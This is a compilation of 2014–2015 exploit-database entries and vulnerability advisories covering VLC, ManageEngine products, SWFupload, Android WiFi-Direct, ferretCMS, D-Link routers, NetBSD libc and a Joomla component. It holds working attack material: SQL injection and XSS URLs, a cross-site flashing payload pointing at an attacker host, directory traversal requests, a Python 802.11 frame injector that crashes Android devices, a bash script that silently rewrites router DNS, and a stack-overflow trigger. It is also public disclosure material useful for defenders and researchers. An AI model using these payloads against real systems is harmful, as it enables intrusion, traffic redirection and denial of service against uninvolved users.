CVE ID : CVE-2014-9597 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>
windbglog : windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13389/windbglog.txt>
Discovered : 24 November 2014
Reported : 26 December 2014
Published : 9 January 2015

Description :
VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted FLV file <http://www.datafilehost.com/d/9565165f>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.

# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================

Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================

Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and project management built on the ITIL framework. It is available in 29 different languages and is used by more than 85,000 companies, across 186 countries, to manage their IT help desk and assets.

Source: http://www.manageengine.com/products/service-desk/

Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A

Vulnerability Description
==================
A user with limited privileges could gain access to certain functionality that is available only to administrative users. For example, users with Guest privileges can see the subjects of the tickets, stats and other information related to tickets.

Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0

Timeline
======
23-Dec-2014 – Notification to Vendor
24-Dec-2014 – Response from Vendor
30-Dec-2014 – Vulnerability fixed by Vendor

About Rewterz
===========
Rewterz is a boutique Information Security company, committed to consistently providing world class professional security services. Our strategy revolves around the need to provide round-the-clock quality information security services and solutions to our customers. We maintain this standard through our highly skilled and professional team, and custom-designed, customer-centric services and products.

http://www.rewterz.com

Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories

SWFupload 2.5.0 - Cross Frame Scripting (XFS)

# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Version : All
# Tested on: Linux / Windows

# Description:
# XSF (cross-site flashing) occurs when an SWF is able to load another file
# from another directory or site. A vulnerable SWF can be exploited simply by
# making it load an attacker-controlled swf/image/any file, which enables
# phishing or cross-site scripting in the context of the hosting site.

# Vulnerable Code:

try {
    ExternalInterface.addCallback("SetButtonTextStyle", this.SetButtonTextStyle);
    this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
} catch(ex:Object) {
    this.SetButtonTextStyle("");
}

As you can see, the buttonTextStyle value is taken straight from the FlashVars
(root.loaderInfo.parameters) without any validation, so SetButtonTextStyle
accepts any value. The vulnerable SWF will therefore load any file:

http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf

2. The same pattern applies to buttonText:

try {
    ExternalInterface.addCallback("SetButtonText", this.SetButtonText);
    this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
} catch(ex:Object) {
    this.SetButtonText("");
}

# PoC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
################################################################################################
#                                                                                              #
#    ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::....    #
#                                                                                              #
################################################################################################

Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
# Affected version: <= Build Version : 9.0

About ManageEngine EventLog Analyzer (From Vendor Site):

EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market. Using this Log Analyzer software, organizations can automate the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting, and archiving from one central location. This event log analyzer software helps to monitor file integrity, conduct log forensics analysis, monitor privileged users and comply to different compliance regulatory bodies by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'm hadihadi from Virangar Security Team
special tnx to: MR.nosrati, black.shadowes, MR.hesy & all virangar members & all hackerz
greetz to my friends in Signal IT Group (www.signal-net.net) & A.Molaei
spl: Z.Khodaee
-------

Exploit:

Directory Traversal (the "url" parameter of index2.do):

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f

XSS (the "url" and "sel" parameters of index2.do are reflected unencoded):

http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate

----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com, a.h.yazdani@signal-net.net

Android WiFi-Direct - Denial of Service

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Android WiFi-Direct Denial of Service

1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL: http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release

2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997

3. *Vulnerability Description*

Some Android devices are affected by a denial of service while scanning for WiFi Direct devices. An attacker within radio range can send a specially crafted 802.11 Probe Response frame that causes the Dalvik subsystem to reboot because of an unhandled exception in the WifiMonitor class. No pairing or prior association with the attacker's device is needed; the victim only has to be scanning.

4. *Vulnerable Packages*

. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2

Other devices could also be affected.

5. *Non-vulnerable packages*

. Android 5.0.1
. Android 5.0.2

6. *Vendor Information, Solutions and Workarounds*

Possible mitigations are to avoid using WiFi-Direct or to update to a non-vulnerable Android version. Contact the vendor for further information.

7. *Credits*

This vulnerability was discovered and researched by Andres Blanco from the CoreLabs Team. The publication of this advisory was coordinated by the Core Advisories Team.

8. *Technical Description / Proof of Concept Code*

Android makes use of a modified *wpa_supplicant* [1] to provide an interface between the wireless driver and the Android platform framework. Below is the JNI function that hands *wpa_supplicant* events to the framework. It returns a jstring built by calling NewStringUTF on the raw event buffer, so whatever the supplicant emits reaches the Java side unchanged.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
    char buf[EVENT_BUF_SIZE];
    int nread = ::wifi_wait_for_event(buf, sizeof buf);
    if (nread > 0) {
        return env->NewStringUTF(buf);
    } else {
        return NULL;
    }
}
-----/

The WiFi-Direct specification defines the P2P discovery procedure, which lets P2P devices exchange device information; the device name is part of this information. The WifiP2pDevice class, located at /wifi/java/android/net/wifi/p2p/WifiP2pDevice.java, represents a Wi-Fi P2P device. Its constructor receives the string provided by *wpa_supplicant* and throws an IllegalArgumentException if the event is malformed. Below is partial content of the WifiP2pDevice.java file.

/-----
[...]
    /** Detailed device string pattern with WFD info
     * Example:
     *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e
     *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188
     *  dev_capab=0x21 group_capab=0x9
     */
    private static final Pattern detailedDevicePattern = Pattern.compile(
        "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "(\\d+ )?" +
        "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
        "name='(.*)' " +
        "config_methods=(0x[0-9a-fA-F]+) " +
        "dev_capab=(0x[0-9a-fA-F]+) " +
        "group_capab=(0x[0-9a-fA-F]+)" +
        "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
    );
[...]
    /**
     * @param string formats supported include
     *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13
     *  pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27
     *  group_capab=0x0 wfd_dev_info=000006015d022a0032
     *
     *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
     *
     *  AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     *  fa:7b:7a:42:02:13
     *
     *  Note: The events formats can be looked up in the wpa_supplicant code
     * @hide
     */
    public WifiP2pDevice(String string) throws IllegalArgumentException {
        String[] tokens = string.split("[ \n]");
        Matcher match;

        if (tokens.length < 1) {
            throw new IllegalArgumentException("Malformed supplicant event");
        }

        switch (tokens.length) {
            case 1:
                /* Just a device address */
                deviceAddress = string;
                return;
            case 2:
                match = twoTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(2);
                return;
            case 3:
                match = threeTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(1);
                return;
            default:
                match = detailedDevicePattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }

                deviceAddress = match.group(3);
                primaryDeviceType = match.group(4);
                deviceName = match.group(5);
                wpsConfigMethodsSupported = parseHex(match.group(6));
                deviceCapability = parseHex(match.group(7));
                groupCapability = parseHex(match.group(8));
                if (match.group(9) != null) {
                    String str = match.group(10);
                    wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                            parseHex(str.substring(4,8)),
                            parseHex(str.substring(8,12)));
                }
                break;
        }

        if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
            status = AVAILABLE;
        }
    }
[...]
-----/

On some Android devices, processing a probe response frame that carries a WiFi-Direct (P2P) information element whose device name attribute contains specific bytes produces a malformed supplicant event string, which ends up throwing the IllegalArgumentException. Because this exception is not handled, the Android system process dies and the device restarts. Below is partial content of the logcat of a Samsung SM-T310 running Android 4.2.2. Note that in the logged event the addresses are not in colon-separated MAC form and the name='...' field is missing entirely, so detailedDevicePattern cannot match it.

/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event
E/AndroidRuntime( 2129):     at android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129):     at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129):     at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error
-----/

8.1. *Proof of Concept*

This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
# Android WiFi-Direct DoS PoC (CORE-2015-0002). Injects 802.11 probe responses
# whose P2P Device Info attribute carries a device name the framework cannot
# parse. Requires Lorcon and PyLorcon2 and an interface that supports
# injection; written for Python 2.

import sys
import time
import struct
import PyLorcon2


def get_probe_response(source, destination, channel):
    frame = str()
    frame += "\x50\x00"                          # Frame Control (probe response)
    frame += "\x00\x00"                          # Duration
    frame += destination
    frame += source
    frame += source
    frame += "\x00\x00"                          # Sequence Control
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    frame += "\x64\x00"                          # Beacon Interval
    frame += "\x30\x04"                          # Capabilities Information
    # SSID IE
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P vendor-specific IE (WFA OUI 50:6F:9A, OUI type 0x09)
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capability attribute
    frame += "\x02"                              # ID
    frame += "\x02\x00"                          # Length
    frame += "\x21\x00"
    # P2P Device Info attribute
    frame += "\x0D"                              # ID
    frame += "\x1B\x00"                          # Length
    frame += source                              # P2P Device address
    frame += "\x01\x88"                          # Config Methods
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"  # Primary Device Type
    frame += "\x00"                              # Number of Secondary Device Types
    frame += "\x10\x11"                          # WSC attribute: Device Name
    frame += "\x00\x06"                          # Device Name length
    frame += "fafa\xFA\xFA"                      # the bytes that break the parser
    return frame


def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print "  poc.py <iface> <target>"
        print "Example:"
        print "  poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)

    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])

    context = PyLorcon2.Context(iface)
    context.open_injmon()

    channel = 1
    source = str_to_mac("00:11:22:33:44:55")
    frame = get_probe_response(source, destination, channel)

    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/

9. *Report Timeline*

. 2014-09-26: Core Security contacts the Android Security Team to inform them that a vulnerability has been found in Android. Core Security sends a draft advisory with technical details and PoC files.
. 2014-09-29: Android Security Team acknowledges reception of the advisory.
. 2014-09-30: Core Security notifies that the tentative publication date is set for Oct 20th, 2014.
. 2014-09-30: Android Security Team acknowledges.
. 2014-10-16: Core Security requests a status update.
. 2014-10-16: Android Security Team responds that they have classified the vulnerability as low severity and don't currently have a timeline for releasing a fix.
. 2014-10-20: Core Security does not completely agree with the vulnerability classification and reschedules the publication of the advisory.
. 2014-10-16: Android Security Team acknowledges and strengthens its position that they don't currently have a timeline for releasing a fix.
. 2015-01-06: Core Security requests a status update.
. 2015-01-12: Core Security asks for confirmation of reception of the previous email.
. 2015-01-16: Android Security Team acknowledges and responds that they don't currently have a timeline for releasing a fix.
. 2015-01-19: Core Security notifies that vendor cooperation is needed in order to keep this process coordinated. If the vendor refuses to provide the requested information the advisory will be released tagged as 'user release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20: Android Security Team acknowledges and responds that they don't currently have a timeline for releasing a fix.
. 2015-01-26: The advisory CORE-2015-0002 is published.

10. *References*

[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2

11. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
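To make the crash path in section 8 concrete, the following Python is added here as an example; it is not Core Security's code nor part of Android. It ports the detailed-event branch of the WifiP2pDevice constructor quoted above (Java's Matcher.find() becomes re.search()), walks the tagged parameters of a probe response to pull the device name bytes out of the P2P Device Info attribute, and shows the handling a hardened WifiMonitor needs: catch the parse failure and drop the event instead of letting it kill the system process. GOOD_EVENT is the Javadoc example from the class, BAD_EVENT is the event line from the advisory's logcat excerpt, and POC_IES is the information-element part of the frame the PoC builds, reconstructed offline with the PoC's own source MAC and channel 1; the attribute layouts assumed are the P2P attribute header (1-byte ID, 2-byte little-endian length) and the WSC Device Name attribute (2-byte big-endian ID 0x1011 and length).

```python
import re
import struct

# Port of detailedDevicePattern from WifiP2pDevice.java (quoted in section 8).
DETAILED_DEVICE_PATTERN = re.compile(
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"(\d+ )?"
    r"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"pri_dev_type=(\d+-[0-9a-fA-F]+-\d+) "
    r"name='(.*)' "
    r"config_methods=(0x[0-9a-fA-F]+) "
    r"dev_capab=(0x[0-9a-fA-F]+) "
    r"group_capab=(0x[0-9a-fA-F]+)"
    r"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
)

P2P_OUI_TYPE = b"\x50\x6f\x9a\x09"   # Wi-Fi Alliance OUI + P2P OUI type
ATTR_DEVICE_INFO = 0x0D              # P2P Device Info attribute ID
WPS_ATTR_DEVICE_NAME = 0x1011        # WSC Device Name attribute ID


def p2p_device_name(ies):
    """Walk the 802.11 tagged parameters of a probe response and return the raw
    Device Name bytes from the P2P Device Info attribute, or None if absent."""
    off = 0
    while off + 2 <= len(ies):
        eid, elen = ies[off], ies[off + 1]
        body = ies[off + 2:off + 2 + elen]
        off += 2 + elen
        if eid != 0xDD or not body.startswith(P2P_OUI_TYPE):
            continue
        attrs, a = body[len(P2P_OUI_TYPE):], 0
        while a + 3 <= len(attrs):                 # attribute: id(1) len(2, LE) value
            aid = attrs[a]
            alen = struct.unpack_from("<H", attrs, a + 1)[0]
            val = attrs[a + 3:a + 3 + alen]
            a += 3 + alen
            if aid != ATTR_DEVICE_INFO or len(val) < 17:
                continue
            # Device Info: addr(6) config_methods(2) pri_dev_type(8) num_secondary(1)
            # [secondary types, 8 bytes each] then WSC Device Name: id(2, BE) len(2, BE) name
            pos = 17 + 8 * val[16]
            if pos + 4 > len(val):
                return None
            wid, wlen = struct.unpack_from(">HH", val, pos)
            return val[pos + 4:pos + 4 + wlen] if wid == WPS_ATTR_DEVICE_NAME else None
    return None


def parse_p2p_device_found(event):
    """Mirror the detailed (default) branch of WifiP2pDevice(String).
    Raises ValueError where the Java code throws IllegalArgumentException."""
    tokens = re.split(r"[ \n]", event)
    if len(tokens) < 4:
        raise ValueError("short event forms are not handled in this port")
    m = DETAILED_DEVICE_PATTERN.search(event)
    if m is None:
        raise ValueError("Malformed supplicant event")
    return {
        "device_address": m.group(3),
        "primary_device_type": m.group(4),
        "device_name": m.group(5),
        "wps_config_methods": int(m.group(6), 16),
        "device_capability": int(m.group(7), 16),
        "group_capability": int(m.group(8), 16),
        "wfd_info": m.group(10),
        "available": tokens[0].startswith("P2P-DEVICE-FOUND"),
    }


def handle_supplicant_event(event, log=None):
    """What a hardened WifiMonitor does with the same input: the event came from
    an unauthenticated frame on the air, so a parse failure is logged and the
    event dropped rather than propagated. Returns the device dict or None."""
    try:
        return parse_p2p_device_found(event)
    except ValueError as exc:
        if log is not None:
            log.append("dropped P2P event (%s): %r" % (exc, event))
        return None


# Sample inputs: the Javadoc example, the logcat event, and the PoC frame's IEs.
GOOD_EVENT = ("P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 "
              "pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 "
              "dev_capab=0x27 group_capab=0x0 wfd_dev_info=000006015d022a0032")
BAD_EVENT = ("P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 "
             "'fa\u00ac\u00ac' config_methods=0x188 dev_capab=0x21 group_capab=0x0")
POC_SOURCE = bytes.fromhex("001122334455")        # source MAC hard-coded in the PoC
POC_IES = (
    b"\x00\x07DIRECT-"                                  # SSID
    + b"\x01\x08\x8c\x12\x98\x24\xb0\x48\x60\x6c"       # Supported Rates
    + b"\x03\x01\x01"                                   # DS Parameter Set, channel 1
    + b"\xdd\x27" + P2P_OUI_TYPE                        # P2P vendor IE, 39 bytes
    + b"\x02\x02\x00\x21\x00"                           # P2P Capability
    + b"\x0d\x1b\x00" + POC_SOURCE + b"\x01\x88"        # Device Info: addr, config methods
    + b"\x00\x0a\x00\x50\xf2\x04\x00\x05" + b"\x00"     # primary type, no secondary types
    + b"\x10\x11\x00\x06" + b"fafa\xfa\xfa"             # WSC Device Name, 6 bytes
)

if __name__ == "__main__":
    print("device name bytes in the PoC frame:", p2p_device_name(POC_IES))
    print("javadoc event parses as:", parse_p2p_device_found(GOOD_EVENT)["device_name"])
    dropped = []
    print("logcat event ->", handle_supplicant_event(BAD_EVENT, dropped), dropped)
```

The two 0xFA bytes at the end of the name are not valid UTF-8, which is why the string that reaches the Java side no longer carries a name='...' field the regex can match; the device-name extractor makes that input visible before the supplicant ever rewrites it, and the wrapper is the shape of the fix (bounded trust in supplicant output) rather than a change to the regex.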

ferretCMS 1.0.4-alpha - Multiple Vulnerabilities

Advisory: Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a

==========================
Vulnerability Description:
==========================

The content management system ferretCMS v.1.0.4, which is currently in alpha development stage, suffers from multiple stored/reflected XSS and SQLi vulnerabilities in its administrative backend. Moreover, arbitrary files can be uploaded via the administrative backend, and the uploaded files can be executed by unauthenticated users, too.

==================
Technical Details:
==================

A reflected XSS vulnerability can be found in the parameter "action" used in the file admin.php:

http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Stored XSS vulnerabilities reside in the logging functionality of ferretCMS. In the administrative backend, the administrator can view events stored in a log. Login attempts to the administrative backend are among the logged events, and the username that was used is displayed there, too. An attacker can abuse this by trying to log in with JavaScript code instead of a username; that code gets executed when the log is viewed.
Login form is located here:

http://{TARGET}/admin.php

XSS gets executed here:

http://{TARGET}/admin.php?type=log&action=read

Another stored XSS vulnerability can be found in the page title of a new blog entry created by the administrator:

vulnerable form:

http://{TARGET}/admin.php?type=page&action=insert&p=

XSS gets executed here:

http://{TARGET}/admin.php?type=page&action=read

The following URLs are prone to SQL injection attacks via the "p" parameter:

http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+

Last but not least there is a file upload functionality in the administrative backend of ferretCMS. The administrator can upload arbitrary files via the following URL:

http://localhost/ferretCMS/admin.php?type=uploader&action=upload

Any unauthenticated user can execute/read the uploaded files by visiting the following URL:

http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}

=========
Solution:
=========

Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================

15/16-Jan-2015 - found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 - release date of this security advisory [without technical details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - sent to lists

========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS

D-Link DSL-2740R - Remote DNS Change

#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link routers are vulnerable to DNS change.
# The vulnerability exists in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY BE AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
#   o Steering unknowing users to bad sites:
#     These sites can be phishing pages that
#     spoof well-known sites in order to
#     trick users into handing out sensitive
#     information.
#
#   o Replacing ads on legitimate sites:
#     Visiting certain sites can serve users
#     with infected systems a different set
#     of ads from those whose systems are
#     not infected.
#
#   o Controlling and redirecting network traffic:
#     Users of infected systems may not be granted
#     access to download important OS and software
#     updates from vendors like Microsoft and from
#     their respective security vendors.
#
#   o Pushing additional malware:
#     Infected systems are more prone to other
#     malware infections (e.g., FAKEAV infection).
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
    echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
    echo " ================================================================"
    echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
    echo " Example: $0 192.168.1.1 8.8.8.8"
    echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
    echo ""
    echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
    echo " http://www.ethical-hacker.org/"
    exit
fi

# GET comes with libwww-perl (lwp-request).
GET=$(which GET 2>/dev/null)
if [ $? -ne 0 ]; then
    echo " Error : libwww-perl not found =/"
    exit
fi

# The form handler takes the new servers as plain GET parameters and requires
# no session; the alternate DNS may be left empty.
"$GET" "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" > /dev/null 2>&1

NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows

// source: https://www.securityfocus.com/bid/48528/info
//
// NetBSD is prone to a stack-based buffer-overflow vulnerability affecting
// multiple functions in the 'libc/net' library.
//
// Successful exploits may allow an attacker to execute arbitrary code in the
// context of the application using the affected library. Failed exploit
// attempts will result in a denial-of-service condition.

/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    char *cycek;
    size_t len;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <service-name-length>\n", argv[0]);
        return 1;
    }

    /* Build a NUL-terminated service name of <len> 'A's. A name longer than
     * the fixed-size stack buffer used by the libc/net lookup code (6051
     * bytes on the tested system, 6050 survives) triggers the overflow. */
    len = (size_t)atoi(argv[1]);
    cycek = malloc(len + 1);
    if (!cycek)
        return 1;
    memset(cycek, 'A', len);
    cycek[len] = '\0';

    getservbyname(cycek, "tcp");

    free(cycek);
    return 0;
}

Joomla! Component com_jr_tfb - 'Controller' Local File Inclusion

source: https://www.securityfocus.com/bid/48558/info

The 'com_jr_tfb' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

